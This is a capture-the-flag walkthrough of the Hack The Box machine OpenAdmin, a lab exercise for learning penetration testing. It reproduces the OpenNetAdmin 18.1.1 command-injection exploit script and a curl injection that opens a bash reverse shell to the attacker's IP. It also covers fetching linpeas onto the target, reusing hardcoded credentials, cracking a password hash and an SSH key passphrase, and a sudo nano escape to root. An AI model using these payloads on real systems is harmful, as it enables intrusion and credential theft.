Previous Page
OpenAdmin Writeup
Introduction :
OpenAdmin is an easy Linux box released back in january 2020.
OpenAdmin is an easy Linux box released back in january 2020.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.0.14.13/16 ] [ /dev/pts/1 ] [~/HTB]
→ nmap -sCV 10.10.10.171
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 21:20 CEST
Nmap scan report for 10.10.10.171
Host is up (0.039s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
For this box we're going to enumerate port 80 using a directory enumeration tool written in go called ffuf with one of the wordlists from seclists:
[ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/OpenAdmin]
→ apt install seclists ffuf
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive
________________________________________________
:: Method : GET
:: URL : http://10.10.10.171/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Output file : ffuf.txt
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401
________________________________________________
artwork [Status: 301, Size: 314, Words: 20, Lines: 10]
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
music [Status: 301, Size: 312, Words: 20, Lines: 10]
:: Progress: [4681/4681] :: Job [1/1] :: 978 req/sec :: Duration: [0:00:07] :: Errors: 0 ::
Now from here we can scrape the results that got outputted in ffuf.txt using a python script:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ cat ffuf.txt
{"commandline":"ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt","time":"2021-05-27T07:01:23+02:00","results":[{"input":{"FUZZ":"artwork"},"position":695,"status":301,"length":314,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://10.10.10.171/artwork/","resultfile":"","url":"http://10.10.10.171/artwork","host":"10.10.10.171"},{"input":{"FUZZ":"index.html"},"position":2176,"status":200,"length":10918,"words":3499,"lines":376,"content-type":"text/html","redirectlocation":"","resultfile":"","url":"http://10.10.10.171/index.html","host":"10.10.10.171"},{"input":{"FUZZ":"music"},"position":2747,"status":301,"length":312,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://10.10.10.171/music/","resultfile":"","url":"http://10.10.10.171/music","host":"10.10.10.171"}],"config":{"autocalibration":false,"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt","configfile":"","postdata":"","delay":{"value":"0.00"},"dirsearch_compatibility":false,"extensions":[],"filters":{},"follow_redirects":false,"headers":{},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"clusterbomb","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"FUZZ","value":"/usr/share/seclists/Discovery/Web-Content/common.txt"}],"inputshell":"","matchers":{"status":{"value":"200,204,301,302,307,401"}},"maxtime":0,"maxtime_job":0,"method":"GET","noninteractive":false,"outputdirectory":"","outputfile":"ffuf.txt","outputformat":"json","OutputCreateEmptyFile":false,"proxyurl":"","quiet":false,"rate":0,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://10.10.10.171/FUZZ","verbose":false}}%
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ vim scraper.py
#!/usr/bin/python
import sys
import json
import requests
import argparse
from bs4 import BeautifulSoup
def results(file):
content=open(file,'r').readlines()
for line in content:
data=json.loads(line.strip())
urls=[]
for url in data['results']:
urls.append(url['url'])
return urls
def crawl(url):
r = requests.get(url)
soup = BeautifulSoup(r.text,'lxml')
links = soup.findAll('a',href=True)
for link in links:
link=link['href']
if link and link!='#':
print('[+] {} : {} '.format(url,link))
if __name__ == '__main__' :
parser =argparse.ArgumentParser()
parser.add_argument("file",help="ffuf results")
args = parser.parse_args()
urls=results(args.file)
for url in urls:
crawl(url)
Now execute it and see the result:
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ python3 scraper.py
usage: scraper.py [-h] file
scraper.py: error: the following arguments are required: file
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ python3 scraper.py ffuf.txt
[+] http://10.10.10.171/artwork : index.html
[+] http://10.10.10.171/artwork : index.html
[+] http://10.10.10.171/artwork : about.html
[+] http://10.10.10.171/artwork : services.html
[+] http://10.10.10.171/artwork : blog.html
[+] http://10.10.10.171/artwork : contact.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : index.html
[+] http://10.10.10.171/artwork : https://colorlib.com
[+] http://10.10.10.171/index.html : /manual
[+] http://10.10.10.171/index.html : http://httpd.apache.org/docs/2.4/mod/mod_userdir.html
[+] http://10.10.10.171/index.html : https://bugs.launchpad.net/ubuntu/+source/apache2
[+] http://10.10.10.171/music : index.html
[+] http://10.10.10.171/music : ../ona
[+] http://10.10.10.171/music : index.html
[+] http://10.10.10.171/music : category.html
[+] http://10.10.10.171/music : playlist.html
[+] http://10.10.10.171/music : artist.html
[+] http://10.10.10.171/music : blog.html
[+] http://10.10.10.171/music : contact.html
[+] http://10.10.10.171/music : blog.html
[+] http://10.10.10.171/music : contact.html
[+] http://10.10.10.171/music : https://colorlib.com
And so with this we find the ../ona path
ona in this case refers to OpenNetAdmin, and we know that it is version 18.1.1, so let's see if there are any CVEs for this service:
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ searchsploit opennetadmin
------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------ ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)| php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh
------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
And here you see that we have a few exploits to work with. We're going to take a look at the RCE one:
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ cp $(locate 47691.sh) .
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ ls
47691.sh ffuf.txt scraper.py
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ vim 47691.sh
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
Very simplistic exploit, it just needs the URL of the ona instance of the machine:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ dos2unix 47691.sh
dos2unix: converting file 47691.sh to Unix format...
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ ./47691.sh http://10.10.10.171/ona/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -lash
total 72K
4.0K drwxrwxr-x 10 www-data www-data 4.0K Nov 22 2019 .
4.0K drwxr-x--- 7 www-data www-data 4.0K Nov 21 2019 ..
4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 .htaccess.example
4.0K drwxrwxr-x 2 www-data www-data 4.0K Jan 3 2018 config
4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 config_dnld.php
8.0K -rw-rw-r-- 1 www-data www-data 4.1K Jan 3 2018 dcm.php
4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 images
4.0K drwxrwxr-x 9 www-data www-data 4.0K Jan 3 2018 include
4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 index.php
4.0K drwxrwxr-x 5 www-data www-data 4.0K Jan 3 2018 local
8.0K -rw-rw-r-- 1 www-data www-data 4.5K Jan 3 2018 login.php
4.0K -rw-rw-r-- 1 www-data www-data 1.1K Jan 3 2018 logout.php
4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 modules
4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 plugins
4.0K drwxrwxr-x 2 www-data www-data 4.0K Jan 3 2018 winc
4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 workspace_plugins
And there we have command execution as www-data! However the more we test this, the more we see that we are very limited with our shell (unable to access python3, bash and such) so let's manually push a bash shell:
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.14.13/4443 0>%261'&xajaxargs[]=ping" http://10.10.10.171/ona/
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ nc -lvnp 4443
listening on [any] 4443 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.171] 43106
bash: cannot set terminal process group (1077): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@openadmin:/opt/ona/www$ which python python3
which python python3
/usr/bin/python3
www-data@openadmin:/opt/ona/www$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@openadmin:/opt/ona/www$ ^Z
[1] + 3470018 suspended nc -lvnp 4443
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ stty raw -echo ; fg
[1] + 3470018 continued nc -lvnp 4443
www-data@openadmin:/opt/ona/www$ export TERM=screen-256color
www-data@openadmin:/opt/ona/www$ export SHELL=bash
www-data@openadmin:/opt/ona/www$ stty rows 40 columns 125
www-data@openadmin:/opt/ona/www$ reset
Let's see which users we can privesc to:
www-data@openadmin:/opt/ona/www$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
www-data@openadmin:/opt/ona/www$ ls -lashR /home
/home:
total 16K
4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 .
4.0K drwxr-xr-x 24 root root 4.0K Nov 21 2019 ..
4.0K drwxr-x--- 5 jimmy jimmy 4.0K Nov 22 2019 jimmy
4.0K drwxr-x--- 6 joanna joanna 4.0K Nov 28 2019 joanna
ls: cannot open directory '/home/jimmy': Permission denied
ls: cannot open directory '/home/joanna': Permission denied
To enumerate this box automatically we can use linpeas.sh:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ locate linpeas.sh
/home/nothing/HTB/Postman/linpeas.sh
/home/nothing/HTB/Traverxec/linpeas.sh
/home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
www-data@openadmin:/opt/ona/www$ which wget curl
/usr/bin/wget
/usr/bin/curl
www-data@openadmin:/opt/ona/www$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
--2021-05-27 06:39:01-- http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: '/tmp/peas.sh'
/tmp/peas.sh 100%[====================================================>] 333.85K 695KB/s in 0.5s
2021-05-27 06:39:02 (695 KB/s) - '/tmp/peas.sh' saved [341863/341863]
www-data@openadmin:/opt/ona/www$ chmod +x /tmp/peas.sh
www-data@openadmin:/opt/ona/www$ /tmp/peas.sh
Linpeas gives alot of output, one thing that stands out is the following:
OpenNetAdmin has a database settings php file in /var/www/html/ona/local/config/database_settings.inc.php
www-data@openadmin:/opt/ona/www$ cd /var/www/html/ona/local/config
www-data@openadmin:/var/www/html/ona/local/config$ ls -lash
total 16K
4.0K drwxrwxr-x 2 www-data www-data 4.0K Nov 21 2019 .
4.0K drwxrwxr-x 5 www-data www-data 4.0K Jan 3 2018 ..
4.0K -rw-r--r-- 1 www-data www-data 426 Nov 21 2019 database_settings.inc.php
4.0K -rw-rw-r-- 1 www-data www-data 1.2K Jan 3 2018 motd.txt.example
0 -rw-r--r-- 1 www-data www-data 0 Nov 21 2019 run_installer
www-data@openadmin:/var/www/html/ona/local/config$ vim database_settings.inc.php
And here we see some hardcoded credentials:
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
?>
And as it turns out, those were jimmy's credentials!
[ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/OpenAdmin]
→ ssh jimmy@10.10.10.171
The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.171' (ECDSA) to the list of known hosts.
jimmy@10.10.10.171's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu May 27 07:04:20 UTC 2021
System load: 0.0 Processes: 121
Usage of /: 49.3% of 7.81GB Users logged in: 0
Memory usage: 29% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$ id
uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
jimmy@openadmin:~$ ls
jimmy@openadmin:~$ ls -lash
total 32K
4.0K drwxr-x--- 5 jimmy jimmy 4.0K Nov 22 2019 .
4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 ..
0 lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 2019 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout
4.0K -rw-r--r-- 1 jimmy jimmy 3.7K Apr 4 2018 .bashrc
4.0K drwx------ 2 jimmy jimmy 4.0K Nov 21 2019 .cache
4.0K drwx------ 3 jimmy jimmy 4.0K Nov 21 2019 .gnupg
4.0K drwxrwxr-x 3 jimmy jimmy 4.0K Nov 22 2019 .local
4.0K -rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile
So now we can access the /var/www/internal directory:
jimmy@openadmin:/var/www/internal$ ls -lash
total 20K
4.0K drwxrwx--- 2 jimmy internal 4.0K Nov 23 2019 .
4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 ..
4.0K -rwxrwxr-x 1 jimmy internal 3.2K Nov 22 2019 index.php
4.0K -rwxrwxr-x 1 jimmy internal 185 Nov 23 2019 logout.php
4.0K -rwxrwxr-x 1 jimmy internal 339 Nov 23 2019 main.php
jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/
internal.conf openadmin.conf
jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/internal.conf
Listen 127.0.0.1:52846
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
AssignUserID joanna joanna
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
The /var/www/internal/ directory is being used by the apache2 site whose configuration is at /etc/apache2/sites-enabled/internal.conf And it seems to be running on the machine's localhost port 52846, No need to view the page itself because we have access to it's php sourcecode:
jimmy@openadmin:/var/www/internal$ cat index.php | grep password
.form-signin input[type="password"] {
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
$msg = 'Wrong username or password.';
So here we get a hashed password, so let's crack it with john:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ cat pass.hashed.txt
00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
Possible Hashs:
[+] SHA-512
[+] Whirlpool
Least Possible Hashs:
[+] SHA-512(HMAC)
[+] Whirlpool(HMAC)
--------------------------------------------------
We get hinted that this is a SHA512 hash, so let's crack it using john and rockyou.txt
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ john pass.hashed.txt --format=Raw-SHA512 --wordlist=/usr/share/wordlists/rockyou.txt --rules=Jumbo
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Revealed (?)
1g 0:00:00:02 DONE (2021-05-27 09:06) 0.4504g/s 6963Kp/s 6963Kc/s 6963KC/s Rey428..Reesenme
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And we get the password 'Revealed'! So let's create a ssh tunnel to the box to view the internal website:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password: n1nj4W4rri0R!
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu May 27 08:16:54 UTC 2021
System load: 0.0 Processes: 118
Usage of /: 49.3% of 7.81GB Users logged in: 1
Memory usage: 29% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu May 27 07:04:21 2021 from 10.10.14.13
jimmy@openadmin:~$
Here you could create a SSH tunnel to get to the internal website like so:
jimmy@openadmin:~$ ssh -R 1337:127.0.0.1:52946 root@10.10.14.13
However there's a simpler method:
jimmy@openadmin:/var/www/internal$ curl localhost:52846/main.php
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
Don't forget your "ninja" password
Click here to logout Session
And we have an encrypted ssh key! so let's crack it:
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ vim id_rsa
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ file id_rsa
id_rsa: PEM RSA private key
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ locate ssh2john
/usr/share/john/ssh2john.py
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ john id_rsa.hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:02 DONE (2021-05-27 10:16) 0.3496g/s 5014Kp/s 5014Kc/s 5014KC/sa6_123..*7¡Vamos!
Session completed
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ chmod 600 id_rsa
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ ssh joanna@10.10.10.171 -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu May 27 08:24:40 UTC 2021
System load: 0.0 Processes: 123
Usage of /: 49.6% of 7.81GB Users logged in: 1
Memory usage: 29% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Jan 2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
joanna@openadmin:~$ ls
user.txt
joanna@openadmin:~$ cat user.txt
c9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the user flag.
Now in order to privesc to the root user, we run linpeas again:
[ 10.10.14.13/23 ] [ /dev/pts/12 ] [~/HTB/OpenAdmin]
→ ls -lash linpeas.sh
336K -rwxr-xr-x 1 nothing nothing 334K May 27 08:13 linpeas.sh
[ 10.10.14.13/23 ] [ /dev/pts/12 ] [~/HTB/OpenAdmin]
→ python3 -m http.server 9090
joanna@openadmin:~$ wget http://10.10.14.13:9090/linpeas.sh
--2021-05-27 08:26:50-- http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[====================================================================================================================================================>] 333.85K 696KB/s in 0.5s
2021-05-27 08:26:50 (696 KB/s) - ‘linpeas.sh’ saved [341863/341863]
joanna@openadmin:~$ chmod +x linpeas.sh
joanna@openadmin:~$ ./linpeas.sh
And here we see that joanna can run nano as the root user:
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
Nano allows inserting external files into the current one using the shortcut CTRL+R, so let's do it:
joanna@openadmin:~$ sudo -u root /bin/nano /opt/priv
^R
Here we see that we can execute a command using CTRL+X, so we're going to get a shell using the following:
The shell gets a bit weird once you do it but it effectively spawns a root shell as intended:
Command to execute: reset; sh 1>&0 2>&0# id
uid=0(root) gid=0(root) groups=0(root) ^X Read File
# cat /root/root.txt M-F New Buffer
2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
